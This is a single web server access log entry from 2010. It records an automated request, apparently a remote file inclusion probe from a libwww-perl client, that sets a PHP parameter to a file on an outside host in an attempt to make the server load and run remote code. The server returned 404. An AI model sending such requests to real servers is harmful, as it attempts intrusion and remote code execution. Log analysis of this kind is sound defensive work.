95.110.193.26 - - [06/May/2010:06:45:21 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
